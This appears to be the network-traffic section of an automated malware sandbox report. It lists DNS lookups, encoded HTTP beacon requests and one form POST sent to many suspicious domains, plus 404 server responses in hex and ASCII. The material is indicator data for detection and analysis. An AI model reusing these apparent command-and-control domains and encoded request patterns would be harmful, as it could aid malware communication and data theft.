              Source: global trafficHTTP traffic detected: GET /o88r/?mdTH1=bxE0iX4XoFeHD&qv=ziUBiNnCPTx0D232rFQwjQWBJ2PwWO/HNMEY4JnQ/dp2McfnObEL3B7pH1vKCMUWbPbfwsQNrL01ZGvoHnWjjgv1+A2qamhcdttfVO4Msc1G8UjhkUNcBItFNFtkrM08Iw== HTTP/1.1Host: www.trosky.lolAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /g63r/?qv=uwE9W1gEeRT3xaNZ5laEGVLvRRr8OGUx/NkqE9kWs/xtCXBFyKtKIePCM37YE2Aku8uhwL43Ah5J/aGVnusYLdiyGgibWBe+RSLxFgU8ILecgK7xnSqJuEcUwjiTs/Zemg==&mdTH1=bxE0iX4XoFeHD HTTP/1.1Host: www.xiuqicloud.websiteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /q42a/?mdTH1=bxE0iX4XoFeHD&qv=KHFMfDcBqqD58HqHVwBpw956tIxFmes299vMd1tBHw2EfWEicNiVUCHjtqO/0LmdUEA7FAozoHN6Y9FOZdZUWUpAba1XTLVv7RyMBlrKLlY827gl2m+z0CRbWSU3ubIAcQ== HTTP/1.1Host: www.limiles.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /1d7h/?qv=KbCgRIpr/NbvJk+gSDO4syPkP444985EpmoKKTlNAKHxdo10VweA/X8MfmC9OnFogwQ2GYvbPqVjlQn6XCLlTf3yQaFbXSRoOhBqaLmdJwdnGxuyEGod3N4ZJvueQKPQSA==&mdTH1=bxE0iX4XoFeHD HTTP/1.1Host: www.ticquan.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /17v5/?qv=xzK9ppO4/JgfeY2gKtlHq+AgtNYtNVCMlS6VR5FAwfJ1pkcgTvslxZMNc2qrVVkK/Kfe4V9yGkehWSlbyrVh43PrqBPFQ3BtBZ2BPmKB2yukgyHTV0+0aeBy3ao+rmLh2Q==&mdTH1=bxE0iX4XoFeHD HTTP/1.1Host: www.israeljobs.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /bf3b/?qv=PfEua2JmTO64AnwjLoWqQ0mk9IIUaXIwir0XXve9Ck0xyMQPL5tC4wwAqIskl1zyACl/dVMa+w0lcQMCAnpj1wyxiMYabOOvBumjb6gu/c1ITljvTWSHLJCTRiszVT0faQ==&mdTH1=bxE0iX4XoFeHD HTTP/1.1Host: www.nullus.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /a8it/?mdTH1=bxE0iX4XoFeHD&qv=SPUUvQKZflCEt7RI8wzTHcF8SQi3M6mUZJPT09uToqfxraPH5+GDvQMdOLMGl5Jp8s5mfJoCw+IZUR581enoinjb4o+InpAuKgIwbcaGv/Cj/PXhhofWHPR6K1XLJJVSxg== HTTP/1.1Host: www.dfsdf.partyAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /zl05/?qv=AWdBDJ+GqNUS2XFGJXspkqvu8fMaqBTyvpNObziMfhQkMcZeRNcLYnQ+YBY+SC9LdAZXvp8klsLVctGiAigj2rUf1EKTbgIlvnhcXDfrRl6QUw16w4+KIppI87woBLyMdg==&mdTH1=bxE0iX4XoFeHD HTTP/1.1Host: www.bjogo.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /xeqx/?qv=TFrecUEThPSuGpZQ9jJ96nL160aLhhYwH3+4gUd5u2zSZlV+WN+qL271FxAcX20m49VqBVK+wDLU5TjrYIuKLG6M3YZ7a6xO3nKHdQ14lZUzLLPfgmRCDHs93AW5FV+VYg==&mdTH1=bxE0iX4XoFeHD HTTP/1.1Host: www.timeinsardinia.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /1lt7/?qv=zS9N3xx1dCu1Lv3OeRtzlFb8cLMxQDILDgoR8aT4IJcNpxg9HHCbym/+kqjjMQmA++tj3hJfWPMBf0y72Cn/ErdYiIpUxpo3qc6g13zJ5Bkxr4+6vKS2/plrF3xv2bggzQ==&mdTH1=bxE0iX4XoFeHD HTTP/1.1Host: www.bitcoinvendor.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
              Source: global trafficDNS traffic detected: DNS query: www.zkplant.xyz
              Source: global trafficDNS traffic detected: DNS query: www.adventurerepair24.live
              Source: global trafficDNS traffic detected: DNS query: www.meacci.xyz
              Source: global trafficDNS traffic detected: DNS query: www.sfrouter.express
              Source: global trafficDNS traffic detected: DNS query: www.trosky.lol
              Source: global trafficDNS traffic detected: DNS query: www.xiuqicloud.website
              Source: global trafficDNS traffic detected: DNS query: www.limiles.xyz
              Source: global trafficDNS traffic detected: DNS query: www.ticquan.xyz
              Source: global trafficDNS traffic detected: DNS query: www.israeljobs.net
              Source: global trafficDNS traffic detected: DNS query: www.nullus.xyz
              Source: global trafficDNS traffic detected: DNS query: www.dfsdf.party
              Source: global trafficDNS traffic detected: DNS query: www.bjogo.top
              Source: global trafficDNS traffic detected: DNS query: www.timeinsardinia.info
              Source: global trafficDNS traffic detected: DNS query: www.bitcoinvendor.xyz
              Source: unknownHTTP traffic detected: POST /gc4d/ HTTP/1.1Host: www.adventurerepair24.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.adventurerepair24.liveReferer: http://www.adventurerepair24.live/gc4d/Cache-Control: no-cacheContent-Length: 203Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36Data Raw: 71 76 3d 47 63 7a 6c 65 72 77 34 62 50 4a 55 76 6a 55 75 57 4b 4b 75 4e 57 58 4d 6f 52 41 63 30 4e 36 4e 4f 79 32 2b 72 6e 33 62 4f 7a 72 46 79 53 69 71 4b 63 57 42 38 67 77 36 78 4e 73 38 38 62 73 72 63 56 51 51 33 6b 51 70 65 2f 4d 33 6c 32 38 58 31 46 56 43 6d 2b 4c 72 45 46 50 37 65 36 62 66 64 6d 46 4f 33 7a 31 6d 49 67 4e 46 35 6e 70 70 33 4e 34 63 6c 2b 52 36 7a 6d 45 35 6c 46 31 78 56 30 78 72 2b 61 51 51 32 4d 4e 6c 56 4d 70 71 41 7a 70 6c 57 70 72 67 6f 41 69 35 61 61 52 33 51 32 50 78 30 74 48 33 66 57 4b 75 58 61 4f 55 4c 44 44 38 6e 50 6c 77 79 56 61 70 4a 4b 44 57 4a 77 38 6e 6a 52 63 3d Data Ascii: qv=Gczlerw4bPJUvjUuWKKuNWXMoRAc0N6NOy2+rn3bOzrFySiqKcWB8gw6xNs88bsrcVQQ3kQpe/M3l28X1FVCm+LrEFP7e6bfdmFO3z1mIgNF5npp3N4cl+R6zmE5lF1xV0xr+aQQ2MNlVMpqAzplWprgoAi5aaR3Q2Px0tH3fWKuXaOULDD8nPlwyVapJKDWJw8njRc=
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Feb 2025 17:12:13 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rXkTg95HlNZdR6E2Yd%2BgH2b%2BkmrvMfU44FkoA4WHj4LL9jbk9IaCKUttWtRpzzYt2hnXpUT0674%2BeOG9HEC1YNvoogylxvTrLykdBF9lGmcdf5l6qeLHLPUN6W35pw3N36ATVpfsOQNNTA8osA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9105f66d4eda443e-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1660&min_rtt=1660&rtt_var=830&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=826&delivery_rate=0&cwnd=198&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c4 30 14 84 ef f9 15 cf 3d e9 c1 bc 6e a9 e0 e1 11 70 b7 5d 5c a8 6b d1 f6 e0 31 6b de 92 42 6d 6a 92 b6 f8 ef a5 5d 04 af 33 df 0c 33 74 93 bf ee eb 8f aa 80 e7 fa a5 84 aa d9 95 c7 3d 6c ee 11 8f 45 7d 40 cc eb fc ea a4 32 41 2c 4e 1b 25 c8 c6 af 4e 91 65 6d 94 a0 d8 c6 8e 55 96 64 70 72 11 0e 6e ec 0d e1 55 14 84 2b 44 67 67 7e 96 dc 56 fd 63 ec 56 09 1a 54 6d 19 3c 7f 8f 1c 22 1b 68 de 4a 98 75 80 de 45 b8 2c 1c b8 1e a2 6d 03 04 f6 13 7b 49 38 2c 4d 5e 09 d2 c6 78 0e 41 3d 0d fa d3 32 a6 32 93 0f 29 dc 36 e7 b1 8f e3 1d bc af 01 d0 11 e6 79 96 da 4c dc c7 d1 b3 e7 41 b7 3e cd 64 d7 4e 0c 95 f3 11 1e 13 c2 bf 32 41 b8 ae 25 5c 5f fe 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 24 e8 d3 ed 20 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: eaLAK0=np]\k1kBmj]33t=lE}@2A,N%NemUdprnU+Dgg~VcVTm<"hJuE,m{I8,M^xA=22)6yLA>dN2A%\_b$ 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Feb 2025 17:12:16 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LyyqF0fCAK6v4i4mPnLKPNVbH7HV75tjaTauMxIKNNz9kIqkoZM2IhAhXPFwDkFTkdgiISDDISUFSoSYYVmhN0ORiaGa%2FKKHIV7knb5327TyWGoQuNH21cnV27PqcR3EsyaMt20xkuYcIeH1Ew%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9105f67dcba04352-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2021&min_rtt=2021&rtt_var=1010&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=846&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c4 30 14 84 ef f9 15 cf 3d e9 c1 bc 6e a9 e0 e1 11 70 b7 5d 5c a8 6b d1 f6 e0 31 6b de 92 42 6d 6a 92 b6 f8 ef a5 5d 04 af 33 df 0c 33 74 93 bf ee eb 8f aa 80 e7 fa a5 84 aa d9 95 c7 3d 6c ee 11 8f 45 7d 40 cc eb fc ea a4 32 41 2c 4e 1b 25 c8 c6 af 4e 91 65 6d 94 a0 d8 c6 8e 55 96 64 70 72 11 0e 6e ec 0d e1 55 14 84 2b 44 67 67 7e 96 dc 56 fd 63 ec 56 09 1a 54 6d 19 3c 7f 8f 1c 22 1b 68 de 4a 98 75 80 de 45 b8 2c 1c b8 1e a2 6d 03 04 f6 13 7b 49 38 2c 4d 5e 09 d2 c6 78 0e 41 3d 0d fa d3 32 a6 32 93 0f 29 dc 36 e7 b1 8f e3 1d bc af 01 d0 11 e6 79 96 da 4c dc c7 d1 b3 e7 41 b7 3e cd 64 d7 4e 0c 95 f3 11 1e 13 c2 bf 32 41 b8 ae 25 5c 5f fe 02 00 00 ff ff 0d 0a Data Ascii: eaLAK0=np]\k1kBmj]33t=lE}@2A,N%NemUdprnU+Dgg~VcVTm<"hJuE,m{I8,M^xA=22)6yLA>dN2A%\_
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Feb 2025 17:12:18 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hARtj1MqzcL2HUCnhdiGi%2BuG9%2F6KUFwhC3neMCtNzshhijLCOftRAvtiQc88DjMmLwvY1E9wgyLzhPdrs01OYbfUs6Mv3eXrPUdn32%2BNrRmEU1zC4sgiFbRRyRc1ilgavlO%2BcC5zFIRAfJAReA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9105f68d2f5d15a3-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1901&min_rtt=1901&rtt_var=950&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1863&delivery_rate=0&cwnd=127&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c4 30 14 84 ef f9 15 cf 3d e9 c1 bc 6e a9 e0 e1 11 70 b7 5d 5c a8 6b d1 f6 e0 31 6b de 92 42 6d 6a 92 b6 f8 ef a5 5d 04 af 33 df 0c 33 74 93 bf ee eb 8f aa 80 e7 fa a5 84 aa d9 95 c7 3d 6c ee 11 8f 45 7d 40 cc eb fc ea a4 32 41 2c 4e 1b 25 c8 c6 af 4e 91 65 6d 94 a0 d8 c6 8e 55 96 64 70 72 11 0e 6e ec 0d e1 55 14 84 2b 44 67 67 7e 96 dc 56 fd 63 ec 56 09 1a 54 6d 19 3c 7f 8f 1c 22 1b 68 de 4a 98 75 80 de 45 b8 2c 1c b8 1e a2 6d 03 04 f6 13 7b 49 38 2c 4d 5e 09 d2 c6 78 0e 41 3d 0d fa d3 32 a6 32 93 0f 29 dc 36 e7 b1 8f e3 1d bc af 01 d0 11 e6 79 96 da 4c dc c7 d1 b3 e7 41 b7 3e cd 64 d7 4e 0c 95 f3 11 1e 13 c2 bf 32 41 b8 ae 25 5c 5f fe 02 00 00 ff ff e3 02 00 24 e8 d3 ed 20 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f5LAK0=np]\k1kBmj]33t=lE}@2A,N%NemUdprnU+Dgg~VcVTm<"hJuE,m{I8,M^xA=22)6yLA>dN2A%\_$ 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Feb 2025 17:12:21 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FindNOKJTmj5elwLTnOvgAMpoZhkIz7AwlURXPtuM4gbGbdl1Y6XDAyGumLi6Nstj%2BysXDdel7HFAbFKpKBMTqki6qPg5zaA6WyVhuC%2FdExtrZ2Skc4PvZX7XzsmSOVBq0ad%2FF5BrREponXAiA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9105f69cfeb842f4-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1833&min_rtt=1833&rtt_var=916&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=554&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 32 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 61 64 76 65 6e 74 75 72 65 72 65 70 61 69 72 32 34 2e 6c 69 76 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 120<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.adventurerepair24.live Port 80</address></body></html>0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:13:10 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 31 0b c2 30 10 85 77 c1 ff 70 6e 3a a4 69 a5 63 c8 22 0a 0e ba 88 3f 20 f5 ce 36 90 5e 24 a6 60 ff bd a9 b6 20 ce 8e 8e f7 ee 7b 8f c7 53 4d 6c 9d 9e cf 54 43 06 b5 8a 36 3a d2 65 5e c2 d1 47 d8 f9 8e 51 c9 b7 a8 e4 0b 49 68 e5 b1 1f 2c 17 e2 48 41 ab a6 f8 76 24 45 c9 f1 3d 64 27 68 bc b8 b6 fc 90 45 b6 2e b3 1c 96 e7 aa e3 d8 ad 3e 59 39 a5 cb a9 d9 42 08 30 70 33 88 96 6b 88 1e d0 de 4d e5 08 0e a7 fd 16 0c 23 6c 9a e0 5b 82 6b b0 c4 e8 7a a0 10 7c 48 8e 9a 40 88 a1 e9 3f e2 97 5b 3c 01 f0 75 41 1e 34 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b910wpn:ic"? 6^$` {SMlTC6:e^GQIh,HAv$E=d'hE.>Y9B0p3kM#l[kz|H@?[<uA40
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:13:12 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 31 0b c2 30 10 85 77 c1 ff 70 6e 3a a4 69 a5 63 c8 22 0a 0e ba 88 3f 20 f5 ce 36 90 5e 24 a6 60 ff bd a9 b6 20 ce 8e 8e f7 ee 7b 8f c7 53 4d 6c 9d 9e cf 54 43 06 b5 8a 36 3a d2 65 5e c2 d1 47 d8 f9 8e 51 c9 b7 a8 e4 0b 49 68 e5 b1 1f 2c 17 e2 48 41 ab a6 f8 76 24 45 c9 f1 3d 64 27 68 bc b8 b6 fc 90 45 b6 2e b3 1c 96 e7 aa e3 d8 ad 3e 59 39 a5 cb a9 d9 42 08 30 70 33 88 96 6b 88 1e d0 de 4d e5 08 0e a7 fd 16 0c 23 6c 9a e0 5b 82 6b b0 c4 e8 7a a0 10 7c 48 8e 9a 40 88 a1 e9 3f e2 97 5b 3c 01 f0 75 41 1e 34 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b910wpn:ic"? 6^$` {SMlTC6:e^GQIh,HAv$E=d'hE.>Y9B0p3kM#l[kz|H@?[<uA40
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:13:15 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 31 0b c2 30 10 85 77 c1 ff 70 6e 3a a4 69 a5 63 c8 22 0a 0e ba 88 3f 20 f5 ce 36 90 5e 24 a6 60 ff bd a9 b6 20 ce 8e 8e f7 ee 7b 8f c7 53 4d 6c 9d 9e cf 54 43 06 b5 8a 36 3a d2 65 5e c2 d1 47 d8 f9 8e 51 c9 b7 a8 e4 0b 49 68 e5 b1 1f 2c 17 e2 48 41 ab a6 f8 76 24 45 c9 f1 3d 64 27 68 bc b8 b6 fc 90 45 b6 2e b3 1c 96 e7 aa e3 d8 ad 3e 59 39 a5 cb a9 d9 42 08 30 70 33 88 96 6b 88 1e d0 de 4d e5 08 0e a7 fd 16 0c 23 6c 9a e0 5b 82 6b b0 c4 e8 7a a0 10 7c 48 8e 9a 40 88 a1 e9 3f e2 97 5b 3c 01 f0 75 41 1e 34 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b910wpn:ic"? 6^$` {SMlTC6:e^GQIh,HAv$E=d'hE.>Y9B0p3kM#l[kz|H@?[<uA40
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:13:17 GMTContent-Type: text/htmlContent-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Feb 2025 17:13:23 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 